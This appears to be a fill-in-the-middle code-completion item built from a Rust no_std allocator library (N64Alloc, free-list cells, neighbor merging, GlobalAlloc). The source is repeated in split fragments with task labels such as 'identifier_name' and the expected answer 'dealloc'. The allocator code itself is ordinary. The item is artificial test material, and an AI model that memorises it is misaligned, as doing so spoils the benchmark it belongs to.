let policy = &LARGE_ALLOC_POLICY as &dyn AllocPolicy<'a>;
self.head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
})
}
unsafe fn alloc_impl(&self, layout: Layout) -> Result<NonNull<u8>, AllocErr> {
let size = Bytes(layout.size());
let align = if layout.align() == 0 {
Bytes(1)
} else {
Bytes(layout.align())
};
if size.0 == 0 {
// Ensure that our made up pointer is properly aligned by using the
// alignment as the pointer.
return Ok(NonNull::new_unchecked(align.0 as *mut u8));
}
let word_size: Words = checked_round_up_to(size).ok_or(AllocErr)?;
self.with_free_list_and_policy_for_size(word_size, align, |head, policy| {
alloc_with_refill(word_size, align, head, policy)
})
}
unsafe fn dealloc_impl(&self, ptr: NonNull<u8>, layout: Layout) {
let size = Bytes(layout.size());
if size.0 == 0 {
return;
}
let size: Words = size.round_up_to();
let align = Bytes(layout.align());
self.with_free_list_and_policy_for_size(size, align, |head, policy| {
let cell = (ptr.as_ptr() as *mut CellHeader<'a> as *const CellHeader<'a>).offset(-1);
let cell = &*cell;
let cell: &AllocatedCell<'a> = &*(cell as *const CellHeader as *const AllocatedCell);
let free = cell.as_free_cell(policy);
if policy.should_merge_adjacent_free_cells() {
// Merging with the _previous_ adjacent cell is easy: it is
// already in the free list, so folding this cell into it is all
// that needs to be done. The free list can be left alone.
//
// Merging with the _next_ adjacent cell is a little harder. It
// is already in the free list, but we need to splice it out
// from the free list, since its header will become invalid
// after consolidation, and it is *this* cell's header that
// needs to be in the free list. But we don't have access to the
// pointer pointing to the soon-to-be-invalid header, and
// therefore can't adjust that pointer. So we have a delayed
// consolidation scheme. We insert this cell just after the next
// adjacent cell in the free list, and set the next adjacent
// cell's `NEXT_FREE_CAN_MERGE` bit. The next time that we walk
// the free list for allocation, the bit will be checked and the
// consolidation will happen at that time.
//
// If _both_ the previous and next adjacent cells are free, we
// are faced with a dilemma. We cannot merge all previous,
// current, and next cells together because our singly-linked
// free list doesn't allow for that kind of arbitrary appending
// and splicing. There are a few different kinds of tricks we
// could pull here, but they would increase implementation
// complexity and code size. Instead, we use a heuristic to
// choose whether to merge with the previous or next adjacent
// cell. We could choose to merge with whichever neighbor cell
// is smaller or larger, but we don't. We prefer the previous
// adjacent cell because we can greedily consolidate with it
// immediately, whereas the consolidating with the next adjacent
// cell must be delayed, as explained above.
if let Some(prev) = free
.header
.neighbors
.prev()
.and_then(|p| (*p).as_free_cell())
{
free.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(&free.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev.header.neighbors);
}
return;
}
if let Some(next) = free
.header
.neighbors
.next()
.and_then(|n| (*n).as_free_cell())
{
free.next_free_raw.set(next.next_free());
next.next_free_raw.set(free);
next.set_next_free_can_merge();
return;
}
}
// Either we don't want to merge cells for the current policy, or we
// didn't have the opportunity to do any merging with our adjacent
// neighbors. In either case, push this cell onto the front of the
// free list.
let _head = free.insert_into_free_list(head, policy);
});
}
}
pub static ALLOC_BYTES_LEFT: AtomicI32 = AtomicI32::new(imp::SCRATCH_LEN_BYTES as i32);
pub static ALLOC_BYTES_USED: AtomicI32 = AtomicI32::new(0);
pub use imp::OFFSET as ALLOC_PAGE_OFFSET;
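// Illustrative sketch (assumption, not part of this file): a consuming crate
// would typically register the allocator as the global allocator roughly like
// this (the crate path `n64_alloc` is a placeholder):
//
//     #[global_allocator]
//     static ALLOC: n64_alloc::N64Alloc = n64_alloc::N64Alloc::INIT;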
unsafe impl GlobalAlloc for N64Alloc<'static> {
unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
ALLOC_BYTES_LEFT.fetch_sub(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_add(layout.size() as i32, Ordering::SeqCst);
match self.alloc_impl(layout) {
Ok(ptr) => ptr.as_ptr(),
Err(AllocErr) => ptr::null_mut(),
}
}
unsafe fn dealloc(&self, ptr: *mut u8, layout: Layout) {
ALLOC_BYTES_LEFT.fetch_add(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_sub(layout.size() as i32, Ordering::SeqCst);
if let Some(ptr) = NonNull::new(ptr) {
self.dealloc_impl(ptr, layout);
}
}
} | random_line_split |
|
lib.rs | #![no_std]
#![allow(clippy::declare_interior_mutable_const)]
#![allow(clippy::cast_ptr_alignment)]
#![allow(clippy::needless_lifetimes)]
extern crate alloc;
mod const_init;
mod imp_static_array;
mod neighbors;
mod size_classes;
use const_init::ConstInit;
use core::alloc::{GlobalAlloc, Layout};
use core::cell::Cell;
use core::cmp;
use core::marker::Sync;
use core::ptr::{self, NonNull};
use core::sync::atomic::{AtomicI32, Ordering};
use imp_static_array as imp;
use memory_units::{size_of, ByteSize, Bytes, Pages, RoundUpTo, Words};
use neighbors::Neighbors;
pub(crate) struct AllocErr;
#[inline]
fn checked_round_up_to<T>(b: Bytes) -> Option<T>
where
T: ByteSize,
Bytes: RoundUpTo<T>,
{
if b.0.checked_add(T::BYTE_SIZE.0).is_none() {
None
} else {
Some(b.round_up_to())
}
}
#[repr(C)]
#[derive(Default, Debug)]
struct CellHeader<'a> {
neighbors: Neighbors<'a, CellHeader<'a>>,
}
impl<'a> AsRef<Neighbors<'a, CellHeader<'a>>> for CellHeader<'a> {
fn as_ref(&self) -> &Neighbors<'a, CellHeader<'a>> {
&self.neighbors
}
}
unsafe impl<'a> neighbors::HasNeighbors<'a, CellHeader<'a>> for CellHeader<'a> {
#[inline]
unsafe fn next_checked(
neighbors: &Neighbors<'a, CellHeader<'a>>,
next: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if next.is_null() || CellHeader::next_cell_is_invalid(neighbors) {
None
} else {
Some(&*next)
}
}
#[inline]
unsafe fn prev_checked(
_neighbors: &Neighbors<'a, CellHeader<'a>>,
prev: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if prev.is_null() {
None
} else {
Some(&*prev)
}
}
}
#[repr(C)]
#[derive(Debug)]
struct AllocatedCell<'a> {
header: CellHeader<'a>,
}
#[test]
fn allocated_cell_layout() {
assert_eq!(
size_of::<CellHeader>(),
size_of::<AllocatedCell>(),
"Safety and correctness depends on AllocatedCell being the same as CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
core::mem::align_of::<AllocatedCell>()
);
}
#[repr(C)]
#[derive(Debug)]
struct FreeCell<'a> {
header: CellHeader<'a>,
next_free_raw: Cell<*const FreeCell<'a>>,
}
#[test]
fn free_cell_layout() {
assert_eq!(
size_of::<CellHeader>() + Words(1),
size_of::<FreeCell>(),
"Safety and correctness depends on FreeCell being only one word larger than CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
        core::mem::align_of::<FreeCell>()
);
}
impl<'a> CellHeader<'a> {
// ### Semantics of Low Bits in Neighbors Pointers
//
// If `self.neighbors.next_bit_1` is set, then the cell is allocated, and
// should never be in the free list. If the bit is not set, then this cell
// is free, and must be in the free list (or is in the process of being
// added to the free list).
//
// The `self.neighbors.next` pointer always points to the byte just *after*
// this cell. If the `self.neighbors.next_bit_2` bit is not set, then it
// points to the next cell. If that bit is set, then it points to the
// invalid memory that follows this cell.
fn is_allocated(&self) -> bool {
self.neighbors.get_next_bit_1()
}
fn is_free(&self) -> bool {
!self.is_allocated()
}
fn set_allocated(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_1();
}
fn set_free(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_1();
}
fn next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) -> bool {
neighbors.get_next_bit_2()
}
fn set_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_2();
}
fn clear_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_2();
}
fn size(&self) -> Bytes {
let data = unsafe { (self as *const CellHeader<'a>).offset(1) };
let data = data as usize;
let next = self.neighbors.next_unchecked();
let next = next as usize;
Bytes(next - data)
}
fn as_free_cell(&self) -> Option<&FreeCell<'a>> {
if self.is_free() {
Some(unsafe { &*(self as *const CellHeader as *const FreeCell) })
} else {
None
}
}
// Get a pointer to this cell's data without regard to whether this cell is
// allocated or free.
unsafe fn unchecked_data(&self) -> *const u8 {
(self as *const CellHeader).offset(1) as *const u8
}
// Is this cell aligned to the given power-of-2 alignment?
fn is_aligned_to<B: Into<Bytes>>(&self, align: B) -> bool {
let align = align.into();
let data = unsafe { self.unchecked_data() } as usize;
data & (align.0 - 1) == 0
}
}
impl<'a> FreeCell<'a> {
// Low bits in `FreeCell::next_free_raw`.
//
// If `NEXT_FREE_CELL_CAN_MERGE` is set, then the following invariants hold
// true:
//
// * `FreeCell::next_free_raw` (and'd with the mask) is not null.
// * `FreeCell::next_free_raw` is the adjacent `CellHeader::prev_cell_raw`.
//
// Therefore, this free cell can be merged into a single, larger, contiguous
// free cell with its previous neighbor, which is also the next cell in the
// free list.
const NEXT_FREE_CELL_CAN_MERGE: usize = 0b01;
const _RESERVED: usize = 0b10;
const MASK: usize = !0b11;
fn next_free_can_merge(&self) -> bool {
self.next_free_raw.get() as usize & Self::NEXT_FREE_CELL_CAN_MERGE != 0
}
fn set_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free | Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn clear_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free & !Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn next_free(&self) -> *const FreeCell<'a> {
let next_free = self.next_free_raw.get() as usize & Self::MASK;
next_free as *const FreeCell<'a>
}
unsafe fn from_uninitialized(
raw: NonNull<u8>,
_size: Bytes,
next_free: Option<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> *const FreeCell<'a> {
let next_free = next_free.unwrap_or(ptr::null_mut());
let raw = raw.as_ptr() as *mut FreeCell;
ptr::write(
raw,
FreeCell {
header: CellHeader::default(),
next_free_raw: Cell::new(next_free),
},
);
raw
}
fn as_allocated_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &AllocatedCell<'a> {
CellHeader::set_allocated(&self.header.neighbors);
unsafe { &*(self as *const FreeCell as *const AllocatedCell) }
}
// Try and satisfy the given allocation request with this cell.
fn try_alloc<'b>(
&'b self,
previous: &'b Cell<*const FreeCell<'a>>,
alloc_size: Words,
align: Bytes,
policy: &dyn AllocPolicy<'a>,
) -> Option<&'b AllocatedCell<'a>> {
// First, do a quick check that this cell can hold an allocation of the
// requested size.
let size: Bytes = alloc_size.into();
if self.header.size() < size {
return None;
}
// Next, try and allocate by splitting this cell in two, and returning
// the second half.
//
// We allocate from the end of this cell, rather than the beginning,
// because it allows us to satisfy alignment requests. Since we can
// choose to split at some alignment and return the aligned cell at the
// end.
let next = self.header.neighbors.next_unchecked() as usize;
let split_and_aligned = (next - size.0) & !(align.0 - 1);
let data = unsafe { self.header.unchecked_data() } as usize;
let min_cell_size: Bytes = policy.min_cell_size(alloc_size).into();
if data + size_of::<CellHeader>().0 + min_cell_size.0 <= split_and_aligned {
let split_cell_head = split_and_aligned - size_of::<CellHeader>().0;
let split_cell = unsafe {
&*FreeCell::from_uninitialized(
unchecked_unwrap(NonNull::new(split_cell_head as *mut u8)),
Bytes(next - split_cell_head) - size_of::<CellHeader>(),
None,
policy,
)
};
Neighbors::append(&self.header, &split_cell.header);
self.clear_next_free_can_merge();
if CellHeader::next_cell_is_invalid(&self.header.neighbors) {
CellHeader::clear_next_cell_is_invalid(&self.header.neighbors);
CellHeader::set_next_cell_is_invalid(&split_cell.header.neighbors);
}
return Some(split_cell.as_allocated_cell(policy));
}
// There isn't enough room to split this cell and still satisfy the
// requested allocation. Because of the early check, we know this cell
// is large enough to fit the requested size, but is the cell's data
// properly aligned?
if self.header.is_aligned_to(align) {
previous.set(self.next_free());
let allocated = self.as_allocated_cell(policy);
return Some(allocated);
}
None
}
fn insert_into_free_list<'b>(
&'b self,
head: &'b Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> &'b Cell<*const FreeCell<'a>> {
self.next_free_raw.set(head.get());
head.set(self);
head
}
}
impl<'a> AllocatedCell<'a> {
unsafe fn as_free_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &FreeCell<'a> {
CellHeader::set_free(&self.header.neighbors);
let free: &FreeCell = &*(self as *const AllocatedCell as *const FreeCell);
free.next_free_raw.set(ptr::null_mut());
free
}
fn data(&self) -> *const u8 {
let cell = &self.header as *const CellHeader;
unsafe { cell.offset(1) as *const u8 }
}
}
trait AllocPolicy<'a> {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr>;
fn min_cell_size(&self, alloc_size: Words) -> Words;
fn should_merge_adjacent_free_cells(&self) -> bool;
}
struct LargeAllocPolicy;
static LARGE_ALLOC_POLICY: LargeAllocPolicy = LargeAllocPolicy;
impl LargeAllocPolicy {
const MIN_CELL_SIZE: Words = Words(size_classes::SizeClasses::NUM_SIZE_CLASSES * 2);
}
impl<'a> AllocPolicy<'a> for LargeAllocPolicy {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr> {
// To assure that an allocation will always succeed after refilling the
// free list with this new cell, make sure that we allocate enough to
// fulfill the requested alignment, and still have the minimum cell size
// left over.
let size: Bytes = cmp::max(size.into(), (align + Self::MIN_CELL_SIZE) * Words(2));
let pages: Pages = (size + size_of::<CellHeader>()).round_up_to();
let new_pages = imp::alloc_pages(pages)?;
let allocated_size: Bytes = pages.into();
let free_cell = &*FreeCell::from_uninitialized(
new_pages,
allocated_size - size_of::<CellHeader>(),
None,
self as &dyn AllocPolicy<'a>,
);
let next_cell = (new_pages.as_ptr() as *const u8).add(allocated_size.0);
free_cell
.header
.neighbors
.set_next(next_cell as *const CellHeader);
CellHeader::set_next_cell_is_invalid(&free_cell.header.neighbors);
Ok(free_cell)
}
fn min_cell_size(&self, _alloc_size: Words) -> Words {
Self::MIN_CELL_SIZE
}
fn should_merge_adjacent_free_cells(&self) -> bool {
true
}
}
#[inline]
unsafe fn unchecked_unwrap<T>(o: Option<T>) -> T {
match o {
Some(t) => t,
None => core::hint::unreachable_unchecked(),
}
}
unsafe fn walk_free_list<'a, F, T>(
head: &Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
mut f: F,
) -> Result<T, AllocErr>
where
F: FnMut(&Cell<*const FreeCell<'a>>, &FreeCell<'a>) -> Option<T>,
{
// The previous cell in the free list (not to be confused with the current
// cell's previously _adjacent_ cell).
let previous_free = head;
loop {
let current_free = previous_free.get();
if current_free.is_null() {
return Err(AllocErr);
}
let current_free = Cell::new(current_free);
// Now check if this cell can merge with the next cell in the free
// list.
//
// We don't re-check `policy.should_merge_adjacent_free_cells()` because
// the `NEXT_FREE_CELL_CAN_MERGE` bit only gets set after checking with
// the policy.
while (*current_free.get()).next_free_can_merge() {
let current = &*current_free.get();
current.clear_next_free_can_merge();
let prev_neighbor = unchecked_unwrap(
current
.header
.neighbors
.prev()
.and_then(|p| p.as_free_cell()),
);
current.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(¤t.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev_neighbor.header.neighbors);
}
previous_free.set(prev_neighbor);
current_free.set(prev_neighbor);
}
if let Some(result) = f(previous_free, &*current_free.get()) {
return Ok(result);
}
previous_free.set(&*(*current_free.get()).next_free_raw.get());
}
}
/// Do a first-fit allocation from the given free list.
unsafe fn alloc_first_fit<'a>(
size: Words,
align: Bytes,
head: &Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
walk_free_list(head, policy, |previous, current| {
if let Some(allocated) = current.try_alloc(previous, size, align, policy) {
return Some(unchecked_unwrap(NonNull::new(allocated.data() as *mut u8)));
}
None
})
}
unsafe fn alloc_with_refill<'a, 'b>(
size: Words,
align: Bytes,
head: &'b Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
if let Ok(result) = alloc_first_fit(size, align, head, policy) {
return Ok(result);
}
let cell = policy.new_cell_for_free_list(size, align)?;
let head = (*cell).insert_into_free_list(head, policy);
alloc_first_fit(size, align, head, policy)
}
/// An n64 allocator.
///
/// # Safety
///
/// When used in unix environments, the allocator must not be moved in memory.
/// That is typically not an issue if you're just using it as a `static` global
/// allocator.
pub struct N64Alloc<'a> {
head: imp::Exclusive<*const FreeCell<'a>>,
size_classes: size_classes::SizeClasses<'a>,
}
unsafe impl<'a> Sync for N64Alloc<'a> {}
impl<'a> ConstInit for N64Alloc<'a> {
const INIT: N64Alloc<'a> = N64Alloc {
head: imp::Exclusive::INIT,
size_classes: size_classes::SizeClasses::INIT,
};
}
impl<'a> N64Alloc<'a> {
/// An initial `const` default construction of a `N64Alloc` allocator.
///
/// This is usable for initializing `static`s that get set as the global
/// allocator.
pub const INIT: Self = <Self as ConstInit>::INIT;
unsafe fn with_free_list_and_policy_for_size<F, T>(&self, size: Words, align: Bytes, f: F) -> T
where
F: for<'b> FnOnce(&'b Cell<*const FreeCell<'a>>, &'b dyn AllocPolicy<'a>) -> T,
{
if align <= size_of::<usize>() {
if let Some(head) = self.size_classes.get(size) {
let policy = size_classes::SizeClassAllocPolicy(&self.head);
let policy = &policy as &dyn AllocPolicy<'a>;
return head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
});
}
}
let policy = &LARGE_ALLOC_POLICY as &dyn AllocPolicy<'a>;
self.head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
})
}
unsafe fn alloc_impl(&self, layout: Layout) -> Result<NonNull<u8>, AllocErr> {
let size = Bytes(layout.size());
let align = if layout.align() == 0 {
Bytes(1)
} else {
Bytes(layout.align())
};
if size.0 == 0 {
// Ensure that our made up pointer is properly aligned by using the
// alignment as the pointer.
return Ok(NonNull::new_unchecked(align.0 as *mut u8));
}
let word_size: Words = checked_round_up_to(size).ok_or(AllocErr)?;
self.with_free_list_and_policy_for_size(word_size, align, |head, policy| {
alloc_with_refill(word_size, align, head, policy)
})
}
unsafe fn dealloc_impl(&self, ptr: NonNull<u8>, layout: Layout) {
let size = Bytes(layout.size());
if size.0 == 0 {
return;
}
let size: Words = size.round_up_to();
let align = Bytes(layout.align());
self.with_free_list_and_policy_for_size(size, align, |head, policy| {
let cell = (ptr.as_ptr() as *mut CellHeader<'a> as *const CellHeader<'a>).offset(-1);
let cell = &*cell;
let cell: &AllocatedCell<'a> = &*(cell as *const CellHeader as *const AllocatedCell);
let free = cell.as_free_cell(policy);
if policy.should_merge_adjacent_free_cells() {
// Merging with the _previous_ adjacent cell is easy: it is
// already in the free list, so folding this cell into it is all
// that needs to be done. The free list can be left alone.
//
// Merging with the _next_ adjacent cell is a little harder. It
// is already in the free list, but we need to splice it out
// from the free list, since its header will become invalid
// after consolidation, and it is *this* cell's header that
// needs to be in the free list. But we don't have access to the
// pointer pointing to the soon-to-be-invalid header, and
// therefore can't adjust that pointer. So we have a delayed
// consolidation scheme. We insert this cell just after the next
// adjacent cell in the free list, and set the next adjacent
// cell's `NEXT_FREE_CAN_MERGE` bit. The next time that we walk
// the free list for allocation, the bit will be checked and the
// consolidation will happen at that time.
//
// If _both_ the previous and next adjacent cells are free, we
// are faced with a dilemma. We cannot merge all previous,
// current, and next cells together because our singly-linked
// free list doesn't allow for that kind of arbitrary appending
// and splicing. There are a few different kinds of tricks we
// could pull here, but they would increase implementation
// complexity and code size. Instead, we use a heuristic to
// choose whether to merge with the previous or next adjacent
// cell. We could choose to merge with whichever neighbor cell
// is smaller or larger, but we don't. We prefer the previous
// adjacent cell because we can greedily consolidate with it
                // immediately, whereas consolidating with the next adjacent
// cell must be delayed, as explained above.
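                // Illustrative sketch of the delayed-merge case (added for
                // clarity, not from the original source). Freeing cell B when
                // its next adjacent cell C is already free:
                //
                //     memory:     [ A ][ B (being freed) ][ C (free) ]
                //     free list:  ... -> C -> ...   becomes   ... -> C -> B -> ...
                //
                // C's `NEXT_FREE_CELL_CAN_MERGE` bit is set, so B and C are
                // folded into one cell on the next free-list walk.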
if let Some(prev) = free
.header
.neighbors
.prev()
.and_then(|p| (*p).as_free_cell())
{
free.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(&free.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev.header.neighbors);
}
return;
}
if let Some(next) = free
.header
.neighbors
.next()
.and_then(|n| (*n).as_free_cell())
{
free.next_free_raw.set(next.next_free());
next.next_free_raw.set(free);
next.set_next_free_can_merge();
return;
}
}
// Either we don't want to merge cells for the current policy, or we
// didn't have the opportunity to do any merging with our adjacent
// neighbors. In either case, push this cell onto the front of the
// free list.
let _head = free.insert_into_free_list(head, policy);
});
}
}
pub static ALLOC_BYTES_LEFT: AtomicI32 = AtomicI32::new(imp::SCRATCH_LEN_BYTES as i32);
pub static ALLOC_BYTES_USED: AtomicI32 = AtomicI32::new(0);
pub use imp::OFFSET as ALLOC_PAGE_OFFSET;
unsafe impl GlobalAlloc for N64Alloc<'static> {
unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
ALLOC_BYTES_LEFT.fetch_sub(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_add(layout.size() as i32, Ordering::SeqCst);
match self.alloc_impl(layout) {
Ok(ptr) => ptr.as_ptr(),
Err(AllocErr) => ptr::null_mut(),
}
}
unsafe fn | (&self, ptr: *mut u8, layout: Layout) {
ALLOC_BYTES_LEFT.fetch_add(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_sub(layout.size() as i32, Ordering::SeqCst);
if let Some(ptr) = NonNull::new(ptr) {
self.dealloc_impl(ptr, layout);
}
}
}
| dealloc | identifier_name |
lib.rs | #![no_std]
#![allow(clippy::declare_interior_mutable_const)]
#![allow(clippy::cast_ptr_alignment)]
#![allow(clippy::needless_lifetimes)]
extern crate alloc;
mod const_init;
mod imp_static_array;
mod neighbors;
mod size_classes;
use const_init::ConstInit;
use core::alloc::{GlobalAlloc, Layout};
use core::cell::Cell;
use core::cmp;
use core::marker::Sync;
use core::ptr::{self, NonNull};
use core::sync::atomic::{AtomicI32, Ordering};
use imp_static_array as imp;
use memory_units::{size_of, ByteSize, Bytes, Pages, RoundUpTo, Words};
use neighbors::Neighbors;
pub(crate) struct AllocErr;
#[inline]
fn checked_round_up_to<T>(b: Bytes) -> Option<T>
where
T: ByteSize,
Bytes: RoundUpTo<T>,
{
if b.0.checked_add(T::BYTE_SIZE.0).is_none() {
None
} else {
Some(b.round_up_to())
}
}
#[repr(C)]
#[derive(Default, Debug)]
struct CellHeader<'a> {
neighbors: Neighbors<'a, CellHeader<'a>>,
}
impl<'a> AsRef<Neighbors<'a, CellHeader<'a>>> for CellHeader<'a> {
fn as_ref(&self) -> &Neighbors<'a, CellHeader<'a>> {
&self.neighbors
}
}
unsafe impl<'a> neighbors::HasNeighbors<'a, CellHeader<'a>> for CellHeader<'a> {
#[inline]
unsafe fn next_checked(
neighbors: &Neighbors<'a, CellHeader<'a>>,
next: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if next.is_null() || CellHeader::next_cell_is_invalid(neighbors) {
None
} else {
Some(&*next)
}
}
#[inline]
unsafe fn prev_checked(
_neighbors: &Neighbors<'a, CellHeader<'a>>,
prev: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if prev.is_null() {
None
} else {
Some(&*prev)
}
}
}
#[repr(C)]
#[derive(Debug)]
struct AllocatedCell<'a> {
header: CellHeader<'a>,
}
#[test]
fn allocated_cell_layout() {
assert_eq!(
size_of::<CellHeader>(),
size_of::<AllocatedCell>(),
"Safety and correctness depends on AllocatedCell being the same as CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
core::mem::align_of::<AllocatedCell>()
);
}
#[repr(C)]
#[derive(Debug)]
struct FreeCell<'a> {
header: CellHeader<'a>,
next_free_raw: Cell<*const FreeCell<'a>>,
}
#[test]
fn free_cell_layout() {
assert_eq!(
size_of::<CellHeader>() + Words(1),
size_of::<FreeCell>(),
"Safety and correctness depends on FreeCell being only one word larger than CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
        core::mem::align_of::<FreeCell>()
);
}
impl<'a> CellHeader<'a> {
// ### Semantics of Low Bits in Neighbors Pointers
//
// If `self.neighbors.next_bit_1` is set, then the cell is allocated, and
// should never be in the free list. If the bit is not set, then this cell
// is free, and must be in the free list (or is in the process of being
// added to the free list).
//
// The `self.neighbors.next` pointer always points to the byte just *after*
// this cell. If the `self.neighbors.next_bit_2` bit is not set, then it
// points to the next cell. If that bit is set, then it points to the
// invalid memory that follows this cell.
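    // Added summary of the flag combinations described above (derived from the
    // comments and accessors in this impl):
    //
    //   next_bit_1 | next_bit_2 | meaning
    //   -----------+------------+------------------------------------------------
    //        0     |      0     | free cell, `next` points at a valid neighbor
    //        0     |      1     | free cell, `next` points at invalid trailing memory
    //        1     |      0     | allocated cell, `next` points at a valid neighbor
    //        1     |      1     | allocated cell, `next` points at invalid trailing memory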
fn is_allocated(&self) -> bool {
self.neighbors.get_next_bit_1()
}
fn is_free(&self) -> bool {
!self.is_allocated()
}
fn set_allocated(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_1();
}
fn set_free(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_1();
}
fn next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) -> bool {
neighbors.get_next_bit_2()
}
fn set_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_2();
}
fn clear_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_2();
}
fn size(&self) -> Bytes {
let data = unsafe { (self as *const CellHeader<'a>).offset(1) };
let data = data as usize;
let next = self.neighbors.next_unchecked();
let next = next as usize;
Bytes(next - data)
}
fn as_free_cell(&self) -> Option<&FreeCell<'a>> {
if self.is_free() {
Some(unsafe { &*(self as *const CellHeader as *const FreeCell) })
} else {
None
}
}
// Get a pointer to this cell's data without regard to whether this cell is
// allocated or free.
unsafe fn unchecked_data(&self) -> *const u8 {
(self as *const CellHeader).offset(1) as *const u8
}
// Is this cell aligned to the given power-of-2 alignment?
fn is_aligned_to<B: Into<Bytes>>(&self, align: B) -> bool {
let align = align.into();
let data = unsafe { self.unchecked_data() } as usize;
data & (align.0 - 1) == 0
}
}
impl<'a> FreeCell<'a> {
// Low bits in `FreeCell::next_free_raw`.
//
// If `NEXT_FREE_CELL_CAN_MERGE` is set, then the following invariants hold
// true:
//
// * `FreeCell::next_free_raw` (and'd with the mask) is not null.
// * `FreeCell::next_free_raw` is the adjacent `CellHeader::prev_cell_raw`.
//
// Therefore, this free cell can be merged into a single, larger, contiguous
// free cell with its previous neighbor, which is also the next cell in the
// free list.
const NEXT_FREE_CELL_CAN_MERGE: usize = 0b01;
const _RESERVED: usize = 0b10;
const MASK: usize = !0b11;
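    // Added note: the two low bits are available for these flags because cells
    // are always at least word-aligned, so a genuine `*const FreeCell` has them
    // cleared; and-ing with `MASK` recovers the real pointer.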
fn next_free_can_merge(&self) -> bool {
self.next_free_raw.get() as usize & Self::NEXT_FREE_CELL_CAN_MERGE != 0
}
fn set_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free | Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn clear_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free & !Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn next_free(&self) -> *const FreeCell<'a> {
let next_free = self.next_free_raw.get() as usize & Self::MASK;
next_free as *const FreeCell<'a>
}
unsafe fn from_uninitialized(
raw: NonNull<u8>,
_size: Bytes,
next_free: Option<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> *const FreeCell<'a> {
let next_free = next_free.unwrap_or(ptr::null_mut());
let raw = raw.as_ptr() as *mut FreeCell;
ptr::write(
raw,
FreeCell {
header: CellHeader::default(),
next_free_raw: Cell::new(next_free),
},
);
raw
}
fn as_allocated_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &AllocatedCell<'a> {
CellHeader::set_allocated(&self.header.neighbors);
unsafe { &*(self as *const FreeCell as *const AllocatedCell) }
}
// Try and satisfy the given allocation request with this cell.
fn try_alloc<'b>(
&'b self,
previous: &'b Cell<*const FreeCell<'a>>,
alloc_size: Words,
align: Bytes,
policy: &dyn AllocPolicy<'a>,
) -> Option<&'b AllocatedCell<'a>> {
// First, do a quick check that this cell can hold an allocation of the
// requested size.
let size: Bytes = alloc_size.into();
if self.header.size() < size {
return None;
}
// Next, try and allocate by splitting this cell in two, and returning
// the second half.
//
// We allocate from the end of this cell, rather than the beginning,
        // because it allows us to satisfy alignment requests: we can choose
        // to split at some alignment and return the aligned cell at the end.
let next = self.header.neighbors.next_unchecked() as usize;
let split_and_aligned = (next - size.0) & !(align.0 - 1);
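        // Worked example (illustrative numbers only): with next = 0x1040,
        // size = 0x20 and align = 0x10, `split_and_aligned` becomes
        // (0x1040 - 0x20) & !0xF = 0x1020, so the returned data pointer is
        // 16-byte aligned and sits flush against the end of this cell.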
let data = unsafe { self.header.unchecked_data() } as usize;
